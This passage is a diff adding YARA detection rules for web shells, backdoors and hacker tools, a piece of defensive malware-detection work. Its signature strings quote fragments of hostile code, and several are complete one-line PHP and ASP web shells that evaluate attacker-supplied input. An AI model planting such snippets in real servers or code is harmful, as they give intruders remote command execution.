+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash7 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+		$s2 = " KB </td>" fullword
+		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+		$s4 = "<!-- <tr align=\"center\"> " fullword
+	condition:
+		all of them
+}
+
+rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "40a1f840111996ff7200d18968e42cfe"
+		hash3 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s4 = "http://www.4ngel.net" fullword
+		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+		$s9 = "Codz by Angel" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_locus7s_c99_w4cking_xxx {
+	meta:
+		description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		hash1 = "9c34adbc8fd8d908cbb341734830f971"
+		hash2 = "ef43fef943e9df90ddb6257950b3538f"
+		hash3 = "ae025c886fbe7f9ed159f49593674832"
+		hash4 = "911195a9b7c010f61b66439d9048f400"
+		hash5 = "697dae78c040150daff7db751fc0c03c"
+		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+		hash12 = "41af6fd253648885c7ad2ed524e0692d"
+		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s1 = "$res = @shell_exec($cfe);" fullword
+		$s8 = "$res = @ob_get_contents();" fullword
+		$s9 = "@exec($cfe,$res);" fullword
+	condition:
+		2 of them
+}
+rule webshell_browser_201_3_ma_ma2_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+		$s2 = "private static String tempdir = \".\";" fullword
+		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010 {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+	strings:
+		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+	condition:
+		2 of them
+}
+rule webshell_r57shell127_r57_kartal_r57 {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
+	strings:
+		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+	condition:
+		2 of them
+}
+
+rule webshell_webshells_new_con2 {
+	meta:
+		description = "Web shells - generated from file con2.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "d3584159ab299d546bd77c9654932ae3"
+	strings:
+		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_make2 {
+	meta:
+		description = "Web shells - generated from file make2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		hash = "9af195491101e0816a263c106e4c145e"
+		score = 50
+	strings:
+		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_aaa {
+	meta:
+		description = "Web shells - generated from file aaa.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "68483788ab171a155db5266310c852b2"
+	strings:
+		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+	condition:
+		1 of them
+}
+rule webshell_Expdoor_com_ASP {
+	meta:
+		description = "Web shells - generated from file Expdoor.com ASP.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "caef01bb8906d909f24d1fa109ea18a7"
+	strings:
+		$s4 = "\">www.Expdoor.com</a>" fullword
+		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
+		$s16 = "<TITLE>Expdoor.com ASP" fullword
+	condition:
+		2 of them
+}
+rule webshell_webshells_new_php2 {
+	meta:
+		description = "Web shells - generated from file php2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "fbf2e76e6f897f6f42b896c855069276"
+	strings:
+		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+	condition:
+		all of them
+}
+rule webshell_bypass_iisuser_p {
+	meta:
+		description = "Web shells - generated from file bypass-iisuser-p.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "924d294400a64fa888a79316fb3ccd90"
+	strings:
+		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+	condition:
+		all of them
+}
+rule webshell_sig_404super {
+	meta:
+		description = "Web shells - generated from file 404super.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "7ed63176226f83d36dce47ce82507b28"
+	strings:
+		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+		$s7 = "//http://require.duapp.com/session.php" fullword
+		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+		$s12 = "//define('pass','123456');" fullword
+		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JSP {
+	meta:
+		description = "Web shells - generated from file JSP.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+	strings:
+		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+	condition:
+		1 of them
+}
+rule webshell_webshell_123 {
+	meta:
+		description = "Web shells - generated from file webshell-123.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "2782bb170acaed3829ea9a04f0ac7218"
+	strings:
+		$s0 = "// Web Shell!!" fullword
+		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+		$s3 = "$default_charset = \"UTF-8\";" fullword
+		$s4 = "// url:http://www.weigongkai.com/shell/" fullword
+	condition:
+		2 of them
+}
+rule webshell_dev_core {
+	meta:
+		description = "Web shells - generated from file dev_core.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "55ad9309b006884f660c41e53150fc2e"
+	strings:
+		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pHp {
+	meta:
+		description = "Web shells - generated from file pHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b0e842bdf83396c3ef8c71ff94e64167"
+	strings:
+		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pppp {
+	meta:
+		description = "Web shells - generated from file pppp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf01cb6e09ee594545693c5d327bdd50"
+	strings:
+		$s0 = "Mail: chinese@hackermail.com" fullword
+		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+		$s6 = "Site: http://blog.weili.me" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_code {
+	meta:
+		description = "Web shells - generated from file code.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a444014c134ff24c0be5a05c02b81a79"
+	strings:
+		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_jspyyy {
+	meta:
+		description = "Web shells - generated from file jspyyy.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_xxxx {
+	meta:
+		description = "Web shells - generated from file xxxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5bcba70b2137375225d8eedcde2c0ebb"
+	strings:
+		$s0 = "<?php eval($_POST[1]);?>  " fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_JJjsp3 {
+	meta:
+		description = "Web shells - generated from file JJjsp3.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "949ffee1e07a1269df7c69b9722d293e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP1 {
+	meta:
+		description = "Web shells - generated from file PHP1.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+	strings:
+		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JJJsp2 {
+	meta:
+		description = "Web shells - generated from file JJJsp2.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5a9fec45236768069c99f0bfd566d754"
+	strings:
+		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_radhat {
+	meta:
+		description = "Web shells - generated from file radhat.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "72cb5ef226834ed791144abaa0acdfd4"
+	strings:
+		$s1 = "sod=Array(\"D\",\"7\",\"S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_asp1 {
+	meta:
+		description = "Web shells - generated from file asp1.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b63e708cd58ae1ec85cf784060b69cad"
+	strings:
+		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_php6 {
+	meta:
+		description = "Web shells - generated from file php6.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "ea75280224a735f1e445d244acdfeb7b"
+	strings:
+		$s1 = "array_map(\"asx73ert\",(ar"
+		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+		$s4 = "shell.php?qid=zxexp  " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_xxx {
+	meta:
+		description = "Web shells - generated from file xxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "0e71428fe68b39b70adb6aeedf260ca0"
+	strings:
+		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+	condition:
+		all of them
+}
+rule webshell_GetPostpHp {
+	meta:
+		description = "Web shells - generated from file GetPostpHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "20ede5b8182d952728d594e6f2bb5c76"
+	strings:
+		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_php5 {
+	meta:
+		description = "Web shells - generated from file php5.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf2ab009cbd2576a806bfefb74906fdf"
+	strings:
+		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP {
+	meta:
+		description = "Web shells - generated from file PHP.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+	strings:
+		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+		$s5 = " - ExpDoor.com</title>" fullword
+		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_Asp {
+	meta:
+		description = "Web shells - generated from file Asp.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "32c87744ea404d0ea0debd55915010b7"
+	strings:
+		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+		$s2 = "Function MorfiCoder(Code)" fullword
+		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+	condition:
+		1 of them
+}
+
+/* Update from hackers tool pack */
+
+rule perlbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+	strings:
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+	condition:
+		1 of them
+}
+rule php_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
+	condition:
+		1 of them
+}
+rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
+	meta:
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+	condition:
+		1 of them
+}
+rule Nshell__1__php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "973fc89694097a41e684b43a21b1b099"
+	strings:
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+	condition:
+		1 of them
+}
+rule shankar_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+	strings:
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+	condition:
+		1 of ($s*) and $sAuthor
+}
+rule Casus15_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+	strings:
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
+	condition:
+		1 of them
+}
+rule small_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+	strings:
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
+	condition:
+		2 of them
+}
+rule shellbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+	strings:
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+	condition:
+		2 of them
+}
+rule fuckphpshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+	strings:
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+	condition:
+		2 of them
+}
+rule ngh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+	strings:
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+	condition:
+		1 of them
+}
+rule jsp_reverse_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+	strings:
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell"
+		$s2 = "http://michaeldaw.org"
+	condition:
+		2 of them
+}
+rule Tool_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+	strings:
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+	condition:
+		2 of them
+}
+rule NT_Addy_asp {
+	meta:
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+	strings:
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+	condition:
+		1 of them
+}
+rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+	condition:
+		1 of them
+}
+rule RemExp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+	condition:
+		2 of them
+}
+rule phvayvv_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
+	condition:
+		1 of them
+}
+rule klasvayv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+	strings:
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+	condition:
+		1 of them
+}
+rule r57shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+	strings:
+		$s0 = "r57shell" fullword
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+	condition:
+		1 of them
+}
+rule rst_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+	strings:
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+	condition:
+		2 of them
+}
+rule wh_bindshell_py {
+	meta:
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fab20902862736e24aaae275af5e049c"
+	strings:
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
